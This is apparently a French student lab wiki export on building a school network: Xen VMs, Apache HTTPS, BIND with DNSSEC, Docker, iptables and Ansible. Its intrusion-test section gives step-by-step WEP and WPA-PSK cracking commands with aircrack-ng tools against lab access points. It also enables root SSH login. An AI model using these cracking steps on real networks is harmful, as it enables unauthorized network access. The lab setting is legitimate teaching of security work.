  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52022</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52022"/>
				<updated>2020-01-05T16:13:30Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du Routeur 1 (R1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
